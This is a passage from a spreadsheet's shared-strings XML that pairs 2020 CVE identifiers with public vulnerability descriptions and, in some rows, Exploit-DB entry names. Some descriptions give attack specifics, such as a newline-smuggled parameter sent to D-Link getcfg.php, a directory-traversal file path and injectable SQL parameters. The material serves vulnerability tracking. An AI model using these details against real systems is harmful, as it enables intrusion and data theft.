    <t>HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a use after free vulnerability. There is a condition exists that the system would reference memory after it has been freed, the attacker should trick the user into running a crafted application with high privilege, successful exploit could cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9263</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 versions earlier than 10.1.0.150(C00E136R5P3) and HUAWEI P30 version earlier than 10.1.0.160(C00E160R2P11) have a use after free vulnerability. There is a condition exists that the system would reference memory after it has been freed, the attacker should trick the user into running a crafted application with common privilege, successful exploit could cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9264</t>
  </si>
  <si>
    <t>ESET Archive Support Module before 1296 allows virus-detection bypass via a crafted Compression Information Field in a ZIP archive. This affects versions before 1294 of Smart Security Premium, Internet Security, NOD32 Antivirus, Cyber Security Pro (macOS), Cyber Security (macOS), Mobile Security for Android, Smart TV Security, and NOD32 Antivirus 4 for Linux Desktop.</t>
  </si>
  <si>
    <t>CVE-2020-9265</t>
  </si>
  <si>
    <t>phpMyChat-Plus 1.98 is vulnerable to multiple SQL injections against the deluser.php Delete User functionality, as demonstrated by pmc_username.</t>
  </si>
  <si>
    <t>CVE-2020-9266</t>
  </si>
  <si>
    <t>SOPlanning 1.45 is vulnerable to a CSRF attack that allows for arbitrary changing of the admin password via process/xajax_server.php.</t>
  </si>
  <si>
    <t>CVE-2020-9267</t>
  </si>
  <si>
    <t>SOPlanning 1.45 is vulnerable to a CSRF attack that allows for arbitrary user creation via process/xajax_server.php.</t>
  </si>
  <si>
    <t>CVE-2020-9268</t>
  </si>
  <si>
    <t>SoPlanning 1.45 is vulnerable to SQL Injection in the OrderBy clause, as demonstrated by the projets.php?order=nom_createur&amp;by= substring.</t>
  </si>
  <si>
    <t>CVE-2020-9269</t>
  </si>
  <si>
    <t>SOPlanning 1.45 is vulnerable to authenticated SQL Injection that leads to command execution via the users parameter, as demonstrated by export_ical.php.</t>
  </si>
  <si>
    <t>CVE-2020-9270</t>
  </si>
  <si>
    <t>ICE Hrm 26.2.0 is vulnerable to CSRF that leads to password reset via service.php.</t>
  </si>
  <si>
    <t>CVE-2020-9271</t>
  </si>
  <si>
    <t>ICE Hrm 26.2.0 is vulnerable to CSRF that leads to user creation via service.php.</t>
  </si>
  <si>
    <t>CVE-2020-9272</t>
  </si>
  <si>
    <t>ProFTPD 1.3.7 has an out-of-bounds (OOB) read vulnerability in mod_cap via the cap_text.c cap_to_text function.</t>
  </si>
  <si>
    <t>CVE-2020-9273</t>
  </si>
  <si>
    <t>In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9274</t>
  </si>
  <si>
    <t>An issue was discovered in Pure-FTPd 1.0.49. An uninitialized pointer vulnerability has been detected in the diraliases linked list. When the *lookup_alias(const char alias) or print_aliases(void) function is called, they fail to correctly detect the end of the linked list and try to access a non-existent list member. This is related to init_aliases in diraliases.c.</t>
  </si>
  <si>
    <t>CVE-2020-9275</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. A cfm UDP service listening on port 65002 allows remote, unauthenticated exfiltration of administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2020-9276</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. The function do_cgi(), which processes cgi requests supplied to the device's web servers, is vulnerable to a remotely exploitable stack-based buffer overflow. Unauthenticated exploitation is possible by combining this vulnerability with CVE-2020-9277.</t>
  </si>
  <si>
    <t>CVE-2020-9277</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. Authentication can be bypassed when accessing cgi modules. This allows one to perform administrative tasks (e.g., modify the admin password) with no authentication.</t>
  </si>
  <si>
    <t>CVE-2020-9278</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. The device can be reset to its default configuration by accessing an unauthenticated URL.</t>
  </si>
  <si>
    <t>CVE-2020-9279</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. A hard-coded account allows management-interface login with high privileges. The logged-in user can perform critical tasks and take full control of the device.</t>
  </si>
  <si>
    <t>CVE-2020-9280</t>
  </si>
  <si>
    <t>In SilverStripe through 4.5, files uploaded via Forms to folders migrated from Silverstripe CMS 3.x may be put to the default "/Uploads" folder instead. This affects installations which allowed upload folder protection via the optional silverstripe/secureassets module under 3.x. This module is installed and enabled by default on the Common Web Platform (CWP). The vulnerability only affects files uploaded after an upgrade to 4.x.</t>
  </si>
  <si>
    <t>CVE-2020-9281</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).</t>
  </si>
  <si>
    <t>CVE-2020-9282</t>
  </si>
  <si>
    <t>In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, certain personal information is discoverable inspecting network responses on the 'Edit access' screen when sharing portfolios.</t>
  </si>
  <si>
    <t>CVE-2020-9283</t>
  </si>
  <si>
    <t>golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.</t>
  </si>
  <si>
    <t>exploits/linux/dos/48121.py</t>
  </si>
  <si>
    <t>Go SSH servers 0.0.2 - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>CVE-2020-9285</t>
  </si>
  <si>
    <t>Some versions of Sonos One (1st and 2nd generation) allow partial or full memory access via attacker controlled hardware that can be attached to the Mini-PCI Express slot on the motherboard that hosts the WiFi card on the device.</t>
  </si>
  <si>
    <t>CVE-2020-9286</t>
  </si>
  <si>
    <t>An improper authorization vulnerability in FortiADC may allow a remote authenticated user with low privileges to perform certain actions such as rebooting the system.</t>
  </si>
  <si>
    <t>CVE-2020-9287</t>
  </si>
  <si>
    <t>An Unsafe Search Path vulnerability in FortiClient EMS online installer 6.2.1 and below may allow a local attacker with control over the directory in which FortiClientEMSOnlineInstaller.exe resides to execute arbitrary code on the system via uploading malicious Filter Library DLL files in that directory.</t>
  </si>
  <si>
    <t>CVE-2020-9288</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiWLC 8.5.1 allows a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the ESS profile or the Radius Profile.</t>
  </si>
  <si>
    <t>CVE-2020-9289</t>
  </si>
  <si>
    <t>Use of a hard-coded cryptographic key to encrypt password data in CLI configuration in FortiManager 6.2.3 and below, FortiAnalyzer 6.2.3 and below may allow an attacker with access to the CLI configuration or the CLI backup file to decrypt the sensitive data, via knowledge of the hard-coded key.</t>
  </si>
  <si>
    <t>CVE-2020-9290</t>
  </si>
  <si>
    <t>An Unsafe Search Path vulnerability in FortiClient for Windows online installer 6.2.3 and below may allow a local attacker with control over the directory in which FortiClientOnlineInstaller.exe and FortiClientVPNOnlineInstaller.exe resides to execute arbitrary code on the system via uploading malicious Filter Library DLL files in that directory.</t>
  </si>
  <si>
    <t>CVE-2020-9291</t>
  </si>
  <si>
    <t>An Insecure Temporary File vulnerability in FortiClient for Windows 6.2.1 and below may allow a local user to gain elevated privileges via exhausting the pool of temporary file names combined with a symbolic link attack.</t>
  </si>
  <si>
    <t>CVE-2020-9292</t>
  </si>
  <si>
    <t>An unquoted service path vulnerability in the FortiSIEM Windows Agent component may allow an attacker to gain elevated privileges via the AoWinAgt executable service path.</t>
  </si>
  <si>
    <t>CVE-2020-9294</t>
  </si>
  <si>
    <t>An improper authentication vulnerability in FortiMail 5.4.10, 6.0.7, 6.2.2 and earlier and FortiVoiceEntreprise 6.0.0 and 6.0.1 may allow a remote unauthenticated attacker to access the system as a legitimate user by requesting a password change via the user interface.</t>
  </si>
  <si>
    <t>CVE-2020-9296</t>
  </si>
  <si>
    <t>Netflix Titus uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, different types of interpolation are supported, including Java EL expressions. If an attacker can inject arbitrary data in the error message template being passed to ConstraintValidatorContext.buildConstraintViolationWithTemplate() argument, they will be able to run arbitrary Java code.</t>
  </si>
  <si>
    <t>CVE-2020-9297</t>
  </si>
  <si>
    <t>Netflix Titus, all versions prior to version v0.1.1-rc.274, uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, different types of interpolation are supported, including Java EL expressions. If an attacker can inject arbitrary data in the error message template being passed to ConstraintValidatorContext.buildConstraintViolationWithTemplate() argument, they will be able to run arbitrary Java code.</t>
  </si>
  <si>
    <t>CVE-2020-9298</t>
  </si>
  <si>
    <t>The Spinnaker template resolution functionality is vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to send requests on behalf of Spinnaker potentially leading to sensitive data disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9299</t>
  </si>
  <si>
    <t>There were XSS vulnerabilities discovered and reported in the Dispatch application, affecting name and description parameters of Incident Priority, Incident Type, Tag Type, and Incident Filter. This vulnerability can be exploited by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-9300</t>
  </si>
  <si>
    <t>The Access Control issues include allowing a regular user to view a restricted incident, user role escalation to admin, users adding themselves as a participant in a restricted incident, and users able to view restricted incidents via the search feature. If your install has followed the secure deployment guidelines the risk of this is lowered, as this may only be exploited by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2020-9301</t>
  </si>
  <si>
    <t>Nolan Ray from Apple Information Security identified a security vulnerability in Spinnaker, all versions prior to version 1.23.4, 1.22.4 or 1.21.5. The vulnerability exists within the handling of SpEL expressions that allows an attacker to read and write arbitrary files within the orca container via authenticated HTTP POST requests.</t>
  </si>
  <si>
    <t>CVE-2020-9306</t>
  </si>
  <si>
    <t>Tesla SolarCity Solar Monitoring Gateway through 5.46.43 has a "Use of Hard-coded Credentials" issue because Digi ConnectPort X2e uses a .pyc file to store the cleartext password for the python user account.</t>
  </si>
  <si>
    <t>CVE-2020-9307</t>
  </si>
  <si>
    <t>Hirschmann OS2, RSP, and RSPE devices before HiOS 08.3.00 allow a denial of service. An unauthenticated, adjacent attacker can cause an infinite loop on one of the HSR ring ports of the device. This effectively breaks the redundancy of the HSR ring. If the attacker can perform the same attack on a second device, the ring is broken into two parts (thus disrupting communication between devices in the different parts).</t>
  </si>
  <si>
    <t>CVE-2020-9308</t>
  </si>
  <si>
    <t>archive_read_support_format_rar5.c in libarchive before 3.4.2 attempts to unpack a RAR5 file with an invalid or corrupted header (such as a header size of zero), leading to a SIGSEGV or possibly unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2020-9309</t>
  </si>
  <si>
    <t>Silverstripe CMS through 4.5 can be susceptible to script execution from malicious upload contents under allowed file extensions (for example HTML code in a TXT file). When these files are stored as protected or draft files, the MIME detection can cause browsers to execute the file contents. Uploads stored as protected or draft files are allowed by default for authorised users only, but can also be enabled through custom logic as well as modules such as silverstripe/userforms. Sites using the previously optional silverstripe/mimevalidator module can configure MIME whitelists rather than extension whitelists, and hence prevent this issue. Sites on the Common Web Platform (CWP) use this module by default, and are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-9311</t>
  </si>
  <si>
    <t>In SilverStripe through 4.5, malicious users with a valid Silverstripe CMS login (usually CMS access) can craft profile information which can lead to XSS for other users through specially crafted login form URLs.</t>
  </si>
  <si>
    <t>CVE-2020-9314</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.</t>
  </si>
  <si>
    <t>CVE-2020-9315</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.</t>
  </si>
  <si>
    <t>CVE-2020-9318</t>
  </si>
  <si>
    <t>Red Gate SQL Monitor 9.0.13 through 9.2.14 allows an administrative user to perform a SQL injection attack by configuring the SNMP alert settings in the UI. This is fixed in 9.2.15.</t>
  </si>
  <si>
    <t>CVE-2020-9320</t>
  </si>
  <si>
    <t>** DISPUTED ** Avira AV Engine before 8.3.54.138 allows virus-detection bypass via a crafted ISO archive. This affects versions before 8.3.54.138 of Antivirus for Endpoint, Antivirus for Small Business, Exchange Security (Gateway), Internet Security Suite for Windows, Prime, Free Security Suite for Windows, and Cross Platform Anti-malware SDK. NOTE: Vendor asserts that vulnerability does not exist in product.</t>
  </si>
  <si>
    <t>CVE-2020-9321</t>
  </si>
  <si>
    <t>configurationwatcher.go in Traefik 2.x before 2.1.4 and TraefikEE 2.0.0 mishandles the purging of certificate contents from providers before logging.</t>
  </si>
  <si>
    <t>CVE-2020-9323</t>
  </si>
  <si>
    <t>Aquaforest TIFF Server 4.0 allows Unauthenticated File and Directory Enumeration via tiffserver/tssp.aspx.</t>
  </si>
  <si>
    <t>CVE-2020-9324</t>
  </si>
  <si>
    <t>Aquaforest TIFF Server 4.0 allows Unauthenticated SMB Hash Capture via UNC.</t>
  </si>
  <si>
    <t>CVE-2020-9325</t>
  </si>
  <si>
    <t>Aquaforest TIFF Server 4.0 allows Unauthenticated Arbitrary File Download.</t>
  </si>
  <si>
    <t>CVE-2020-9326</t>
  </si>
  <si>
    <t>BeyondTrust Privilege Management for Windows and Mac (aka PMWM; formerly Avecto Defendpoint) 5.1 through 5.5 before 5.5 SR1 mishandles command-line arguments with PowerShell .ps1 file extensions present, leading to a DefendpointService.exe crash.</t>
  </si>
  <si>
    <t>CVE-2020-9327</t>
  </si>
  <si>
    <t>In SQLite 3.31.1, isAuxiliaryVtabOperator allows attackers to trigger a NULL pointer dereference and segmentation fault because of generated column optimizations.</t>
  </si>
  <si>
    <t>CVE-2020-9329</t>
  </si>
  <si>
    <t>Gogs through 0.11.91 allows attackers to violate the admin-specified repo-creation policy due to an internal/db/repo.go race condition.</t>
  </si>
  <si>
    <t>CVE-2020-9330</t>
  </si>
  <si>
    <t>Certain Xerox WorkCentre printers before 073.xxx.000.02300 do not require the user to reenter or validate LDAP bind credentials when changing the LDAP connector IP address. A malicious actor who gains access to affected devices (e.g., by using default credentials) can change the LDAP connection IP address to a system owned by the actor without knowledge of the LDAP bind credentials. After changing the LDAP connection IP address, subsequent authentication attempts will result in the printer sending plaintext LDAP (Active Directory) credentials to the actor. Although the credentials may belong to a non-privileged user, organizations frequently use privileged service accounts to bind to Active Directory. The attacker gains a foothold on the Active Directory domain at a minimum, and may use the credentials to take over control of the Active Directory domain. This affects 3655*, 3655i*, 58XX*, 58XXi*, 59XX*, 59XXi*, 6655**, 6655i**, 72XX*, 72XXi*, 78XX**, 78XXi**, 7970**, 7970i**, EC7836**, and EC7856** devices.</t>
  </si>
  <si>
    <t>CVE-2020-9331</t>
  </si>
  <si>
    <t>CryptoPro CSP through 5.0.0.10004 on 32-bit platforms allows Local Privilege Escalation (by local users with the SeChangeNotifyPrivilege right) because user-mode input is mishandled during process creation. An attacker can write arbitrary data to an arbitrary location in the kernel's address space.</t>
  </si>
  <si>
    <t>CVE-2020-9332</t>
  </si>
  <si>
    <t>ftusbbus2.sys in FabulaTech USB for Remote Desktop through 2020-02-19 allows privilege escalation via crafted IoCtl code related to a USB HID device.</t>
  </si>
  <si>
    <t>CVE-2020-9334</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in the Envira Photo Gallery plugin through 1.7.6 for WordPress. Successful exploitation of this vulnerability would allow a authenticated low-privileged user to inject arbitrary JavaScript code that is viewed by other users.</t>
  </si>
  <si>
    <t>CVE-2020-9335</t>
  </si>
  <si>
    <t>Multiple stored XSS vulnerabilities exist in the 10Web Photo Gallery plugin before 1.5.46 WordPress. Successful exploitation of this vulnerability would allow a authenticated admin user to inject arbitrary JavaScript code that is viewed by other users.</t>
  </si>
  <si>
    <t>CVE-2020-9336</t>
  </si>
  <si>
    <t>fauzantrif eLection 2.0 has XSS via the Admin Dashboard -&gt; Settings -&gt; Election -&gt; "message if election is closed" field.</t>
  </si>
  <si>
    <t>CVE-2020-9337</t>
  </si>
  <si>
    <t>In GolfBuddy Course Manager 1.1, passwords are sent (with base64 encoding) via a GET request.</t>
  </si>
  <si>
    <t>CVE-2020-9338</t>
  </si>
  <si>
    <t>SOPlanning 1.45 allows XSS via the "Your SoPlanning url" field.</t>
  </si>
  <si>
    <t>CVE-2020-9339</t>
  </si>
  <si>
    <t>SOPlanning 1.45 allows XSS via the Name or Comment to status.php.</t>
  </si>
  <si>
    <t>CVE-2020-9340</t>
  </si>
  <si>
    <t>fauzantrif eLection 2.0 has SQL Injection via the admin/ajax/op_kandidat.php id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9341</t>
  </si>
  <si>
    <t>CandidATS 2.1.0 is vulnerable to CSRF that allows for an administrator account to be added via the index.php?m=settings&amp;a=addUser URI.</t>
  </si>
  <si>
    <t>CVE-2020-9342</t>
  </si>
  <si>
    <t>The F-Secure AV parsing engine before 2020-02-05 allows virus-detection bypass via crafted Compression Method data in a GZIP archive. This affects versions before 17.0.605.474 (on Linux) of Cloud Protection For Salesforce, Email and Server Security, and Internet GateKeeper.</t>
  </si>
  <si>
    <t>CVE-2020-9343</t>
  </si>
  <si>
    <t>An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows. It is possible to perform a Denial of Service attack because the implementation doesn't limit the parsing of nested JSON structures. If a victim visits an attacker-controlled website, this vulnerability can be exploited via WebSocket data with a deeply nested JSON array.</t>
  </si>
  <si>
    <t>CVE-2020-9344</t>
  </si>
  <si>
    <t>Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.</t>
  </si>
  <si>
    <t>CVE-2020-9345</t>
  </si>
  <si>
    <t>An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows. It is possible to perform a Denial of Service attack because the application doesn't limit the number of opened WebSocket sockets. If a victim visits an attacker-controlled website, this vulnerability can be exploited.</t>
  </si>
  <si>
    <t>CVE-2020-9346</t>
  </si>
  <si>
    <t>Zoho ManageEngine Password Manager Pro 10.4 and prior has no protection against Cross-site Request Forgery (CSRF) attacks, as demonstrated by changing a user's role.</t>
  </si>
  <si>
    <t>CVE-2020-9347</t>
  </si>
  <si>
    <t>** DISPUTED ** Zoho ManageEngine Password Manager Pro through 10.x has a CSV Excel Macro Injection vulnerability via a crafted name that is mishandled by the Export Passwords feature. NOTE: the vendor disputes the significance of this report because they expect CSV risk mitigation to be provided by an external application, and do not plan to add CSV constraints to their own products.</t>
  </si>
  <si>
    <t>CVE-2020-9349</t>
  </si>
  <si>
    <t>The CACAGOO Cloud Storage Intelligent Camera TV-288ZD-2MP with firmware 3.4.2.0919 allows access to the RTSP service without a password.</t>
  </si>
  <si>
    <t>CVE-2020-9350</t>
  </si>
  <si>
    <t>Graph Builder in SAS Visual Analytics 8.5 allows XSS via a graph template that is accessed directly.</t>
  </si>
  <si>
    <t>CVE-2020-9351</t>
  </si>
  <si>
    <t>An issue was discovered in SmartClient 12.0. If an unauthenticated attacker makes a POST request to /tools/developerConsoleOperations.jsp or /isomorphic/IDACall with malformed XML data in the _transaction parameter, the server replies with a verbose error showing where the application resides (the absolute path).</t>
  </si>
  <si>
    <t>CVE-2020-9352</t>
  </si>
  <si>
    <t>An issue was discovered in SmartClient 12.0. Unauthenticated exploitation of blind XXE can occur in the downloadWSDL feature by sending a POST request to /tools/developerConsoleOperations.jsp with a valid payload in the _transaction parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9353</t>
  </si>
  <si>
    <t>An issue was discovered in SmartClient 12.0. The Remote Procedure Call (RPC) loadFile provided by the console functionality on the /tools/developerConsoleOperations.jsp (or /isomorphic/IDACall) URL is affected by unauthenticated Local File Inclusion via directory-traversal sequences in the elem XML element in the _transaction parameter.</t>
  </si>
  <si>
    <t>CVE-2020-9354</t>
  </si>
  <si>
    <t>An issue was discovered in SmartClient 12.0. The Remote Procedure Call (RPC) saveFile provided by the console functionality on the /tools/developerConsoleOperations.jsp (or /isomorphic/IDACall) URL allows an unauthenticated attacker to overwrite files via vectors involving an XML comment and /.. path traversal.</t>
  </si>
  <si>
    <t>CVE-2020-9355</t>
  </si>
  <si>
    <t>danfruehauf NetworkManager-ssh before 1.2.11 allows privilege escalation because extra options are mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-9359</t>
  </si>
  <si>
    <t>KDE Okular before 1.10.0 allows code execution via an action link in a PDF document.</t>
  </si>
  <si>
    <t>CVE-2020-9361</t>
  </si>
  <si>
    <t>CryptoPro CSP through 5.0.0.10004 on 64-bit platforms allows local users with the SeChangeNotifyPrivilege right to cause denial of service because user-mode input is mishandled during process creation.</t>
  </si>
  <si>
    <t>CVE-2020-9362</t>
  </si>
  <si>
    <t>The Quick Heal AV parsing engine (November 2019) allows virus-detection bypass via a crafted GPFLAG in a ZIP archive. This affects Total Security, Home Security, Total Security Multi-Device, Internet Security, Total Security for Mac, AntiVirus Pro, AntiVirus for Server, and Total Security for Android.</t>
  </si>
  <si>
    <t>CVE-2020-9363</t>
  </si>
  <si>
    <t>The Sophos AV parsing engine before 2020-01-14 allows virus-detection bypass via a crafted ZIP archive. This affects Endpoint Protection, Cloud Optix, Mobile, Intercept X Endpoint, Intercept X for Server, and Secure Web Gateway. NOTE: the vendor feels that this does not apply to endpoint-protection products because the virus would be detected upon extraction.</t>
  </si>
  <si>
    <t>CVE-2020-9364</t>
  </si>
  <si>
    <t>An issue was discovered in helpers/mailer.php in the Creative Contact Form extension 4.6.2 before 2019-12-03 for Joomla!. A directory traversal vulnerability resides in the filename field for uploaded attachments via the creativecontactform_upload parameter. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.</t>
  </si>
  <si>
    <t>CVE-2020-9365</t>
  </si>
  <si>
    <t>An issue was discovered in Pure-FTPd 1.0.49. An out-of-bounds (OOB) read has been detected in the pure_strcmp function in utils.c.</t>
  </si>
  <si>
    <t>CVE-2020-9366</t>
  </si>
  <si>
    <t>A buffer overflow was found in the way GNU Screen before 4.8.0 treated the special escape OSC 49. Specially crafted output, or a special program, could corrupt memory and crash Screen or possibly have unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2020-9367</t>
  </si>
  <si>
    <t>The MPS Agent in Zoho ManageEngine Desktop Central MSP build MSP build 10.0.486 is vulnerable to DLL Hijacking: dcinventory.exe and dcconfig.exe try to load CSUNSAPI.dll without supplying the complete path. The issue is aggravated because this DLL is missing from the installation, thus making it possible to hijack the DLL and subsequently inject code, leading to an escalation of privilege to NT AUTHORITY\SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2020-9368</t>
  </si>
  <si>
    <t>The Module Olea Gift On Order module through 5.0.8 for PrestaShop enables an unauthenticated user to read arbitrary files on the server via getfile.php?file=/.. directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-9369</t>
  </si>
  <si>
    <t>Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters.</t>
  </si>
  <si>
    <t>CVE-2020-9370</t>
  </si>
  <si>
    <t>HUMAX HGA12R-02 BRGCAA 1.1.53 devices allow Session Hijacking.</t>
  </si>
  <si>
    <t>CVE-2020-9371</t>
  </si>
  <si>
    <t>Stored XSS exists in the Appointment Booking Calendar plugin before 1.3.35 for WordPress. In the cpabc_appointments.php file, the Calendar Name input could allow attackers to inject arbitrary JavaScript or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-9372</t>
  </si>
  <si>
    <t>The Appointment Booking Calendar plugin before 1.3.35 for WordPress allows user input (in fields such as Description or Name) in any booking form to be any formula, which then could be exported via the Bookings list tab in /wp-admin/admin.php?page=cpabc_appointments.php. The attacker could achieve remote code execution via CSV injection.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48204.txt</t>
  </si>
  <si>
    <t>WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection</t>
  </si>
  <si>
    <t>2020-03-12</t>
  </si>
  <si>
    <t>CVE-2020-9374</t>
  </si>
  <si>
    <t>On TP-Link TL-WR849N 0.9.1 4.16 devices, a remote command execution vulnerability in the diagnostics area can be exploited when an attacker sends specific shell metacharacters to the panel's traceroute feature.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48155.py</t>
  </si>
  <si>
    <t>TP LINK TL-WR849N - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-9375</t>
  </si>
  <si>
    <t>TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.</t>
  </si>
  <si>
    <t>exploits/hardware/dos/48255.py</t>
  </si>
  <si>
    <t>TP-Link Archer C50 3 - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>2020-03-26</t>
  </si>
  <si>
    <t>CVE-2020-9376</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-9377</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-9379</t>
  </si>
  <si>
    <t>The Software Development Kit of the MiContact Center Business with Site Based Security 8.0 through 9.0.1.0 before KB496276 allows an authenticated user to access sensitive information. A successful exploit could allow unauthorized access to user conversations.</t>
  </si>
  <si>
    <t>CVE-2020-9380</t>
  </si>
  <si>
    <t>IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script.</t>
  </si>
  <si>
    <t>CVE-2020-9381</t>
  </si>
  <si>
    <t>controllers/admin.js in Total.js CMS 13 allows remote attackers to execute arbitrary code via a POST to the /admin/api/widgets/ URI. This can be exploited in conjunction with CVE-2019-15954.</t>
  </si>
  <si>
    <t>CVE-2020-9382</t>
  </si>
  <si>
    <t>An issue was discovered in the Widgets extension through 1.4.0 for MediaWiki. Improper title sanitization allowed for the execution of any wiki page as a widget (as defined by this extension) via MediaWiki's {{#widget:}} parser function.</t>
  </si>
  <si>
    <t>CVE-2020-9383</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel 3.16 through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.</t>
  </si>
  <si>
    <t>CVE-2020-9384</t>
  </si>
  <si>
    <t>** DISPUTED ** An Insecure Direct Object Reference (IDOR) vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may only affect a testing version of the application.</t>
  </si>
  <si>
    <t>CVE-2020-9385</t>
  </si>
  <si>
    <t>A NULL Pointer Dereference exists in libzint in Zint 2.7.1 because multiple + characters are mishandled in add_on in upcean.c, when called from eanx in upcean.c during EAN barcode generation.</t>
  </si>
  <si>
    <t>CVE-2020-9386</t>
  </si>
  <si>
    <t>In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore.</t>
  </si>
  <si>
    <t>CVE-2020-9387</t>
  </si>
  <si>
    <t>In Mahara 19.04 before 19.04.5 and 19.10 before 19.10.3, account details are shared in the Elasticsearch results for accounts that are not accessible when the config setting 'Isolated institutions' is turned on.</t>
  </si>
  <si>
    <t>CVE-2020-9388</t>
  </si>
  <si>
    <t>CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-9389</t>
  </si>
  <si>
    <t>A username enumeration issue was discovered in SquaredUp before version 4.6.0. The login functionality was implemented in a way that would enable a malicious user to guess valid username due to a different response time from invalid usernames.</t>
  </si>
  <si>
    <t>CVE-2020-9390</t>
  </si>
  <si>
    <t>SquaredUp allowed Stored XSS before version 4.6.0. A user was able to create a dashboard that executed malicious content in iframe or by uploading an SVG that contained a script.</t>
  </si>
  <si>
    <t>CVE-2020-9391</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel 5.4 and 5.5 through 5.5.6 on the AArch64 architecture. It ignores the top byte in the address passed to the brk system call, potentially moving the memory break downwards when the application expects it to move upwards, aka CID-dcde237319e6. This has been observed to cause heap corruption with the GNU C Library malloc implementation.</t>
  </si>
  <si>
    <t>CVE-2020-9392</t>
  </si>
  <si>
    <t>An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. Because there is no permission check on the ImportJSONTable, createFromTpl, and getJSONExportTable endpoints, unauthenticated users can retrieve pricing table information, create new tables, or import/modify a table.</t>
  </si>
  <si>
    <t>CVE-2020-9393</t>
  </si>
  <si>
    <t>An issue was discovered in the pricing-table-by-supsystic plugin before 1.8.2 for WordPress. It allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-9394</t>
  </si>
  <si>
